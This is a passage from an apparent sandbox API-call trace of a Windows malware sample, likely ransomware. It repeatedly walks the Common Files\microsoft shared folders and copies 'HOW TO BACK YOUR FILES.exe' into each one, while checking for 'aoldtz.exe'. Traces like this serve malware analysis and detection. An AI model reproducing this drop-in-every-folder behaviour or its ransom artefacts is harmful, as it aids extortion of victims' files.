(x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies" [0056.962] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0056.962] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0056.962] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies") returned 75 [0056.962] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies" [0056.962] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.962] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\msenv\\publicassemblies\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.969] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.969] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\MSEnv\\PublicAssemblies\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x522b67d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x53746f60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53746f60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.969] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.969] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.969] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink" [0056.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0056.969] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0056.969] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink") returned 56 [0056.969] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink" [0056.969] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.969] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.977] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.977] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5376d0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5376d0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.978] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.978] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.979] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization" [0056.979] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0056.979] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0056.979] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned 73 [0056.979] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization" [0056.979] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.979] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\hwrcustomization\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.986] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.986] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa21d9876, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x5376d0c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5376d0c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.986] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.986] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.987] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US" [0056.987] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0056.987] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0056.987] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US") returned 62 [0056.987] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US" [0056.987] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.987] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.994] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.994] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53793220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53793220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.995] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.995] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.995] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7" [0056.995] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2effc8 | out: hHeap=0x2b0000) returned 1 [0056.995] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0056.995] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7") returned 60 [0056.995] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7" [0056.995] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.995] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.7\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.001] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.001] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.7\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x53793220, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53793220, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.001] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.002] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.002] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0" [0057.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0057.002] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0057.002] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0") returned 60 [0057.002] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0" [0057.002] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.002] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\1.0\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.008] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.008] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\1.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80105472, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x537b9380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537b9380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.008] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.008] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.008] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help" [0057.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1688 | out: hHeap=0x2b0000) returned 1 [0057.008] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0057.008] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help") returned 57 [0057.008] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help" [0057.008] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.009] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.017] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.017] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x537b9380, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537b9380, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.017] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.017] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.018] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082" [0057.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f05a0 | out: hHeap=0x2b0000) returned 1 [0057.018] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0057.018] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082") returned 62 [0057.018] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082" [0057.018] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.018] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.025] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.025] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed84810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x537df4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537df4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.025] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.025] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.025] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052" [0057.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0490 | out: hHeap=0x2b0000) returned 1 [0057.025] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c48 | out: hHeap=0x2b0000) returned 1 [0057.025] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052") returned 62 [0057.025] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052" [0057.025] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.026] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\2052\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.032] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.032] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\2052\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed5e6b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x537df4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x537df4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.032] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.032] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.032] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049" [0057.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0408 | out: hHeap=0x2b0000) returned 1 [0057.032] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c68 | out: hHeap=0x2b0000) returned 1 [0057.032] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049") returned 62 [0057.032] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049" [0057.032] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.032] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1049\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.039] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.039] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1049\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53805640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53805640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.039] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.039] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.039] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046" [0057.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f01e8 | out: hHeap=0x2b0000) returned 1 [0057.039] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c88 | out: hHeap=0x2b0000) returned 1 [0057.039] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046") returned 62 [0057.039] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046" [0057.039] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.039] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1046\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.044] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.044] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1046\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x53805640, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53805640, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0057.045] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0057.045] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0057.045] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042" [0057.045] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0160 | out: hHeap=0x2b0000) returned 1 [0057.045] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7cc8 | out: hHeap=0x2b0000) returned 1 [0057.045] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042") returned 62 [0057.045] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042" | out: lpString1="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042") returned="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042" [0057.045] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0057.045] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1042\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1042\\how to back your files.exe"), bFailIfExists=1) returned 1 [0057.050] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0057.050] 